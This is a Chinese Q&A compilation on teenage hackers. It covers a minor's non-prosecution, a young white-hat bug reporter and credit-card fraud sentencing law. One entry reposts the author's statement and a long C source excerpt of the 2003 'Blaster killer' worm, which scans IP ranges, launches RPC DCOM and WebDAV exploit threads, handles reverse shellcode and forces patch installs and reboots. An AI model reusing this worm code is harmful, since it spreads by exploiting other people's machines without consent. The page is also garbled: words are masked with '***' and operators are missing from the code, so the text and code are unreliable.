本文目录一览:
- 1、未成年"黑客"为什么会涉嫌犯罪?
- 2、他是我国最小黑客,因不想写作业,而黑掉学校网站,如今过得怎样?
- 3、《冲击波杀手》那个黑客是谁?
- 4、广西18岁黑客阿叶盗刷信用卡那个案件一般会判多少年,他同时被抓的那名小弟又会被判多久?
- 5、18岁黑客涉盗刷信用卡近15亿要怎么处理
未成年"黑客"为什么会涉嫌犯罪?
20岁的江苏淮安小伙王力(化名)1年前还是一名“黑客”:因非法侵入计算机 *** 系统,涉嫌非法侵犯公民个人信息罪被公安机关移送至江苏省淮安市淮阴区人民检察院审查起诉。
出生在苏北农村的王力喜欢学习计算机知识。从初一起,随着掌握的计算机知识越来越多,王力对信息安全技术产生了浓厚兴趣,并牵头创建了一个 *** 群,在群里与其他志趣相投的电脑爱好者一起探讨。
2015年暑假,即将进入高三学习,为了炫耀“黑客”技能,吸引更多好友加入 *** 群,王力侵入一个网站系统后台,将含有大量公民信息的文件压缩包放在群里,供人随意下载。
由于法律观念淡薄,此时的王力压根儿不知道这一炫技行为已涉嫌犯罪。2017年年初,经群众举报,公安机关将已就读某大学信息 *** 管理专业的王力抓获。随后,王力被取保候审。
王力交代,他组建 *** 群的目的是提供一个相互学习计算机的交流平台。在互联网上,利用搜索到各种检测网站漏洞的代码,去检测国内外网站是否存在漏洞。
“找到网站漏洞,我一般也不侵入进去,有时候还会帮助小网站修改网页、堵塞漏洞。”面对检察机关的讯问,王力告诉检察官,他平时检测和侵入网站的举动,就是想多学习掌握一点 *** 技术。
“王力这孩子家庭条件很好,不缺钱,他误入歧途,纯粹就是想在圈子内炫耀 *** 技术。”承办案件的检察官唐新宇说。
2017年8月,当公安机关将案件移交审查起诉时,检察机关开始更多地从王力作为未成年人的视角,而非犯罪行为本身来办理案件。检察机关审查案件时得知,王力作案时未满18周岁。
案发后,王力考上了大学。面对这名特殊的“天才少年”,办案检察官迅速启动社会调查程序,走访王力父母、身边同学、朋友、老师,受访人一致反映王力性格外向、乐于助人,自幼和父母生活,家庭氛围好,爱学习能钻研,对计算机技术感兴趣,没有不良记录。
王力的母亲表示愿意承担监管职责,司法局同意将他纳入社区矫正对象。
2017年暑假期间,王力在某 *** 公司实习期间,在检察机关允许下,他利用 *** 技术,积极协助外省公安部门进入一传销组织内部信息系统,成功破解170多万条注册信息,为警方办案提供重要线索。
2017年12月12日,淮阴区人民检察院依法对王力作出附条件不起诉决定。
检察机关同时开展双向保护,联系心理咨询师进行心理疏导,鼓励其重拾信心,联合王力的父母、学校老师,开展跟踪考察,多方联合对其开展关爱帮教转化。
今年6月12日,经过6个月的考验期,淮阴区人民检察院依法对其作出不起诉决定。
得知可以重返校园,王力一家非常珍惜这次机会,王力母亲在其就读的大学附近租房陪读。而经过多次谈话引导,讲解法律法规,王力也比以前更知法守法。
“现在如果有人或单位请他帮忙破解计算机安全系统,他会之一时间向老师和检察官汇报,询问我们能否‘帮忙’。”今年4月,当唐新宇再一次来到王力所在的学校进行跟踪考察时,王力已从以前的不问不答,变成主动聊天。
更让唐新宇欣慰的是,通过帮教,王力将喜欢的计算机技术用于正途,他个人在国家信息安全漏洞共享平台官方网站“白帽子原创积分排名”中,长期保持全国前5名。
所谓“白帽子”,就是正面“黑客”,他们主要借助掌握的计算机技术,识别计算机系统或 *** 系统中的安全漏洞,但并不会恶意去利用,而是公布其漏洞,便于进一步完善系统的防御功能。
在大学期间,王力还与其他4名同学一起组成“白帽子”团队,钻研网站安全技术,团队共获得国家信息安全 *** 平台颁发的原创漏洞证明130多张,他个人拥有70多张。今年3月,在江苏高校组织的信息安全比赛中,他荣获一等奖。
他是我国最小黑客,因不想写作业,而黑掉学校网站,如今过得怎样?
黑客一般指的是对计算机科学。编程和设计方面具有高度理解的人。他们精通各种编程语言还有各类操作系统,伴随着计算机和 *** 的发展而产生成长。其实黑客的英文本身没有明显的褒义或者变异,他们跟骇客还是有区别的。黑客就好比是是炸弹制造专家,但是骇客不同,他们相当于是 *** ,时不时的拿着IP炸弹去炸人家。黑客的技术也是比较高超的,在之前中国出现过一个年纪最小的黑客,他13岁的年纪就能把360公司黑了。这个人后来过得如何了呢?
他叫汪正扬,2001年出生。他在计算机上边的研究是从小学二年级开始的,那个时候的汪正扬才上小学二年级。而研究的原因估计很多人都想不到,他是偷菜偷了一段时间之后觉得单是玩游戏没有意思,所以就开始尝试些小程序了,天才还是跟别人不一样的。在那个年纪,大部分人都是在玩乐中度过,而汪正扬已经开始了程序的研究。
到了2011年的时候,汪正扬开始试图办网站,年纪小小的他把家里给他买冰棍的钱还有一些零花钱全部攒了下来。他并不是想买什么玩具,而是打算用攒下来的400多元买了一个现成的网站主机,他放上自己写的程序开始自己玩耍。坚持了两年多的时间,2013年的11月,汪正扬自己做了一个新的网站出来。
说起来,汪正扬搞这些并没有耽误学习,2014年的时候,他就在清华附中读初中了。不过还有一个比较搞笑的事,天才少年也会烦恼学校的作业,为此汪正扬还黑了学校网站一次,不过得到的只是更多的作业。
而他对于计算机的研究还在进行,这一年的四月,他给360公司的库带计划提交了一份关于可能影响上百家教育网站的系统漏洞。360的这个库带计划就是专门为漏洞启动的悬赏计划,以现金奖励的方式开始征集系统漏洞,用来帮助软件公司还有开发者即使推出漏洞补丁。
汪正扬是在其中入侵了一个购物平台系统,把原价3266元的商品,改成了2元。他成为了360库带计划遇到的年龄最小漏洞报告者,库带计划的工程师计东认为。虽然说汪正扬提交的漏洞是比较初级的,但是相对于同龄人来说,他的 *** 技术以及互联网安全意识已经远远超过了他们。
有不少人称汪正扬为年龄最小的黑客,但是实际上,汪正扬并不愿意被称呼黑客。根据他自己的描述说,他更愿意被称呼为白帽子。白帽子其实跟黑客是差不多的意思,但是它是属于正面的黑客。也就是说,这类黑客可以识别计算机系统或者 *** 系统中的安全漏洞,但是不会恶意的去利用。而是光明正大地公布他们的漏洞,这样系统就可以再被其他人比如说黑帽子利用之前把漏洞修补完成。
这是属于黑客里的分类,白帽子是正面的黑客,黑帽子是有着黑色产业链的黑客,而灰帽子是擅长攻击技术,但是也不会轻易破坏。脚本小子则是一个贬义词,用来形容一些以黑客自居并且沾沾自喜的初学者。汪正扬说自己是白帽子就是因为他不会用技术做违法的事情,这点还是比较重要的。
2014年9月,汪正扬以13岁的年纪在中国互联网安全大会上成为了中国最小的黑客。而现如今他在清华大学附属实验学校就读,但是根据爆料说,汪正扬在就读期间并不是很认真地听讲。如果在学校混日子的话,未必不会迷失自己,希望他不要成为下一个方仲永。当然,中国现今天才少年也越来越多了,就像18年AI开发者大会上12岁的天才少年袁翊闳,他们将会是国家未来的希望。
《冲击波杀手》那个黑客是谁?
这个问题警察也想知道 也没人在网上公布
给您转一篇文章 也许对您有用
冲击波杀手的作者网上现身
前言:“冲击波”蠕虫爆发后,大量个人主机及服务器遭受侵袭,各大安全公司,杀毒厂商纷纷推出各种解决方案,不料短短几日内,又出现了来历不明的新蠕虫,经过一些安全专家的反向编译和分析,惊讶的发现,该蠕虫的工作目标居然是消灭冲击波蠕虫并自动为受害主机进行补丁,而且该蠕虫还具有定时自毁功能,显然作者的目标还是有一定的善意因素,但是蠕虫毕竟是蠕虫,因为大量icmp包的发送,还是能够给企业局域 *** 带来极大的压力,就此,对蠕虫的危害性依然要保持极大的关注和警惕,相关文章可以参见
8月20日,蠕虫作者突然现身,出现在某安全论坛,以下是该作者论坛上声明的转载,并公开了源代码。
下文为作者自述-转自某安全论坛
玩过了~~ 虫虫四个小时之内已经完成了任务~~~ 不得不写这豆腐块~~~
char *szMe = "=========== I love my wife baby ~~~ Welcome Chian~~~
Notice: 2004 will remove myself~~ sorry zhongli~~~=========== wins";
偶:小地方小公司小小程序员
偶从不玩安全的,临时抱佛脚,看了些资料,仓促写了这个烂虫虫~~~
A 看不惯老外小鸟儿写的什么什么波的烂虫~~ ,虽然偶临时玩安全的即兴之作亦很烂
~~~
B 看不惯国内某几家放毒公司的商业炒作,发网难财,违背良心,误导民众
偶就帮你丫的除光了虫虫,打光了补丁,没想到他丫的误导的更变态~~~ 你丫的方脑壳
~~
C 帮偶不认识的 flashsky 兄解脱些吧~~~ 他丫的 Bill该死,快去谢flashsky~~~
D VirusBOy 兄,baby 可不是情人吆,偶家小子两岁就开始跟偶抢机器了~~
E 长了这么大,算首次报效社会吧~~~
F 几年?进去就是了,不就是个坐吗, 切~~~ 偶是吓大的!
======================================================
0 chian 系 china 笔误~~ 敲的快了,某个指头先到~~~
1 早在 8/13 国际国内骨干路由就丢弃了 135 syn ,只有加入WebDav才玩得转~~~
2 RpcDcom WebDav 使用同一 反向shellcode, 用 eyas的, lion修改
(声明:谁也没给偶,偶从一被人遗忘的公开程序中sniffer的,谢两位)
此shellcode 新进程建在svchost下,就一个Call Ebx 通杀了 all 2k xp
他丫的,还有放毒公司言导致xp机器重启云云的~~~
3 Bill该死 有 Tftpd.exe, 干吗不用,虽然偶看过 Tftp 协议,练习写过~~~
4 某年某月某日某时某刻,
溜出国门,辗转借了几台 Xeon™ 4 cpus, 2g memory 机器
架起 2000 线程的 WebDav 投放玩具,对准某国骨干的几个B段
10 分钟内投放了三四百个种子(早知道有这么多,就换个玩法 ~~~
5 发icmp包是为了提高搜索效率,算唯一的危害了~~~ *** 一下也好~~~
打补丁的虫,杀虫的虫,再不有点儿小危害就丢尽了虫虫家族的脸~~~
//偶婆婆, 烂代码~~~ 将就看吧~~~
BOOL DoServicePackFunction()
{
DWORD nSystemVer = Win2000OrXp();
if ( !( nSystemVer == 0 || nSystemVer == 1) )
return FALSE; // not 2k or xp
if ( ReadRegServicePack(nSystemVer) )
return FALSE; //已经安装了
//识别语言版本
int nLanguageID;
unsigned int unOemCP = GetOEMCP();
LCID lcid = GetSystemDefaultLCID();
WORD wMain = PRIMARYLANGID(lcid);
WORD wSub = SUBLANGID(lcid);
if ( unOemCP == 437 wMain == 9 wSub == 1 ) //en
nLanguageID = 0; //打了你丫的en补丁就不错了~~ 还唧唧歪歪的~~
//管不了小欧洲~~ 俄罗斯牛人有自己的玩法
~~
else if ( unOemCP == 936 wMain == 4 wSub == 2 ) //cn
nLanguageID = 1; //就是为这个来的~~
else if ( unOemCP == 950 wMain == 4 wSub == 1 ) //tw
nLanguageID = 2; //同胞骨肉的忙,一定要帮~~
else if ( unOemCP == 932 wMain == 0x11 wSub == 1 ) //jp
nLanguageID = -1; //偶好有干掉鬼子机器的冲动!
//罢了,冤冤相报何时了~~~ 希望他丫的自新
~~~ 再玩火就灭了他丫的~~
else if ( unOemCP == 949 wMain == 0x12 wSub == 1 ) //kr
nLanguageID = 3; //少些不懂事的小鸟儿弯出去, 危害国内~~
else{
nLanguageID = -1;
}
if ( nLanguageID == -1)
return FALSE;
char szServicePack[] = "RpcServicePack.exe";
// downlaod it~~~
if ( !nSystemVer ) { // 2k
if ( !DownloadSpFile (szServicePack, szWin2kSpUrl[nLanguageID]) )
return FALSE;
}
else{
if ( !DownloadSpFile (szServicePack, szWinXPSpUrl[nLanguageID]) )
return FALSE;
}
char szExec[180];
sprintf(szExec, "%s -n -o -z -q", szServicePack);
HANDLE hProcess = MakeProcess( szExec );
if ( hProcess == NULL )
return FALSE;
if (WaitForSingleObject(hProcess, 360000) != WAIT_OBJECT_0 ){ //六分钟内
未完成
TerminateProcess(hProcess,1);
CloseHandle(hProcess);
DeleteFile(szServicePack);
return FALSE;
}
CloseHandle(hProcess);
Sleep(15000);
DeleteFile(szServicePack);
if ( ReadRegServicePack(nSystemVer) ) {
ShutDownWindows( EWX_REBOOT | EWX_FORCE );//install service pack ok, reboot
it~~~
Sleep(20000); //说偶重启有过? 不重启补丁无效,
找 Bill该死 说去~~~
}
return TRUE;
}
// IN: 始ip, B段数量, 是否随机,是否换WebDav //更烂~~~ 凑合着看~~~
void BeginExploitFunction(u_long ulIpStart, int nBCount, BOOL bRand, BOOL
bWebDav)
{
HANDLE hThread = NULL;
BOOL bFirst = TRUE;
u_long uComp;
for (int i=0;i (nBCount * 256 * 256); i++){
if ( bRand )
uComp = MakeRandIp();
else
uComp = i + ulIpStart;
if ( //还是屏蔽掉部分目标,免得目标中招后,再玩就把下一代干掉了,不破坏的好
~~~
(BYTE)uComp == 0xc5 ||
(BYTE)(uComp8) == 0xc5 ||
(BYTE)(uComp16) == 0xc5 ||
(BYTE)(uComp24) == 0xc5 ||
(WORD)uComp == 0x9999 ||
(WORD)(uComp8) == 0x9999 ||
(WORD)(uComp16) == 0x9999 )
continue;
u_long *myPara = new u_long;
if ( myPara == NULL ){//如果分配失败,再尝试一次
Sleep(100);
myPara = new u_long;
}
if ( myPara ){
if ( hThread )
CloseHandle(hThread);
*myPara = htonl( uComp);
DWORD dwThreadId;
if (bWebDav)
hThread =
CreateThread(NULL,0,ExploitWebDavThread,(LPVOID)myPara,0,dwThreadId);
else
hThread =
CreateThread(NULL,0,ExploitRpcDcomThread,(LPVOID)myPara,0,dwThreadId);
Sleep(2);
}
//添加此处代码,避免首次执行时,线程中的
InterlockedIncrement(g_CurThreadCount) 未来得及运行,一次性建立了N个线程的
bug!
if ( bFirst (i = nMaxThread) ){
Sleep(2000);
bFirst = FALSE;
}
while(g_CurThreadCount = nMaxThread) // #define nMaxThread 300 ,不小心,
玩过了~~~
Sleep(2);
}
Sleep(60000);
}
//服务模式和控制台模式公用主程序
void DoIt()
{
WSADATAwsd;
if(WSAStartup(MAKEWORD(2,2),wsd)!=0)
return;
//杀蠕虫
KillM *** last();
//卸载
SYSTEMTIME st;
GetLocalTime(st);
if ( st.wYear == 2004 ){
MyDeleteService(szServiceName);
MyDeleteService(szServiceTftpd);
RemoveMe();
ExitProcess(1); //其实不必,RemoveMe()中借用了前辈的代码,2k下,退出程序时将
自身文件删除了
}
srand( GetTickCount() );
memset(pPingBuffer, '\xAA', sizeof(pPingBuffer));
//烦请骨干路由器立即丢弃此特征 Icmp Echo 包! 国内的什么什么波已经绝了!~~ 补
丁已经打够了!~~~
//准备WebDav发送缓冲区
do{
pWebDavExploitBuffer = new char[68000];
Sleep(100);
}while(pWebDavExploitBuffer == NULL);
//必须在checkonlien 之前,一次装配好子弹
PressWebDavBufferOnce();
PressRpcDcomBufferOnce();
CheckOnlienAndPressData(); //get LocalIp 修正子弹中的反向ip 和 端口
//打补丁
DoServicePackFunction();
//建立接收线程
DWORD dwThreadID;
HANDLE
hWorkThread=CreateThread(NULL,0,(LPTHREAD_START_ROUTINE)RecvSendCmdThread,(L
PVOID)NULL,0,dwThreadID);
if(hWorkThread==NULL) // RecvSendCmdThread 中阻塞,有反连,再建线程处理之,
同时处理多个反连
return;
CloseHandle(hWorkThread);
if ( !MyStartService(szServiceTftpd) ){
Sleep(1000);
InstallTftpService();
Sleep(1000);
MyStartService(szServiceTftpd);
}
Sleep(2000); //等待接收线程中的全局 rand bind port
u_long ulIP;
for(;{ //估算了一下,普通机器2小时一循环
//首先扫描本ip段
CheckOnlienAndPressData();
ulIP = ntohl(inet_addr(szLocalIp));
ulIP = 0xffff0000;
BeginExploitFunction( ulIP, 1, 0, 0);
//再扫描本ip前后3个段
CheckOnlienAndPressData();
if ( rand() % 2)
ulIP += 0x00010000;
else
ulIP -= 0x00030000;
BeginExploitFunction( ulIP, 3, 0, 0);
//再扫描WebDav一个段,跳出 135 syn封锁
CheckOnlienAndPressData();
ulIP = MAKELONG(0, wdIpHead[ rand()% 76 ]); //请 wdIpHead[] B段IP商注意~~~,
立即采取补救措施~~~ sorry~~~
BeginExploitFunction( ulIP, 1, 0, 1);
//再扫描随机的IP, 数量1个 B段, rpc or webdav
CheckOnlienAndPressData();
if ( rand() % 2)
BeginExploitFunction( ulIP, 1, 1, 0);
else
BeginExploitFunction( ulIP, 1, 1, 1); //偶跳、跳、跳~~~
KillM *** last();
}
//WSACleanup();
}
--------------------------------------------------------------------------------------------------
为方便阅读,增加几个补充说明
1.flashsky 创始人之一,启明星辰安全专家,擅长古体诗词,7月中公开rpc漏洞利用方式源代码,公开溢出分析报告,造成全球安全领域的震动,冲击波蠕虫的主要传播技术来源于这位高手公开的技术描述。
2.VirusBOy 懂点安全的小朋友,水平不咋地,不过你更好别招惹他,DDOS你一把也够受的。
3.某安全公司安全专家评论,该帖子内容基本属实,蠕虫源代码已经得到确认。
瑞星反病毒检测中心今晚再次截获利用微软RPC漏洞进行传播的病毒。不过,这个新病毒生来就是原冲击波病毒的克星。
瑞星反病毒工程师分析说:该病毒的特点是将“冲击波”(Worm.Blaster)病毒干掉,并在系统内值入,预防冲击波病毒的疫苗。
然后这个新病毒会尝试从微软网站下载补丁并自动将受感染的系统打上补丁。然后该病毒会开启数百个的线程PING其它IP地址,并通过RPC漏洞快速传播自己,消耗大量CPU和 *** 资源,并且有可能会导致系统死机。该病毒的作者似乎无意作恶,病毒设定在2004年自行毁灭。
由于该病毒采用PING方式进行探测,只感染能够PING通的机器,因此瑞星反病毒工程师提醒广大用户,设置防火墙的规则,禁止ping,这样可以有效防止该病毒的入侵。
广西18岁黑客阿叶盗刷信用卡那个案件一般会判多少年,他同时被抓的那名小弟又会被判多久?
这个是典型啊,其实黑客很多的,但是一直偷内料的就是傻子,这个要十几年到二十年,同犯那个看是什么性质了,参与刷卡了,是三到七年
18岁黑客涉盗刷信用卡近15亿要怎么处理
你好,很高兴回答您的问题。
之一百九十六条 有下列情形之一,进行信用卡诈骗活动,数额较大的,处五年以下有期徒刑或者拘役,并处二万元以上二十万元以下罚金;数额巨大或者有其他严重情节的,处五年以上十年以下有期徒刑,并处五万元以上五十万元以下罚金;数额特别巨大或者有其他特别严重情节的,处十年以上有期徒刑或者无期徒刑,并处五万元以上五十万元以下罚金或者没收财产:
(一)使用伪造的信用卡,或者使用以虚假的身份证明骗领的信用卡的;
(二)使用作废的信用卡的;
(三)冒用他人信用卡的;
(四)恶意透支的。
前款所称恶意透支,是指持卡人以非法占有为目的,超过规定限额或者规定期限透支,并且经发卡银行催收后仍不归还的行为。
恶意透支,数额在1万元以上不满10万元的,应当认定为刑法之一百九十六条规定的“数额较大”;数额在10万元以上不满100万元的,应当认定为刑法之一百九十六条规定的“数额巨大”;数额在100万元以上的,应当认定为刑法之一百九十六条规定的“数额特别巨大”。
若帮到请采纳,谢谢
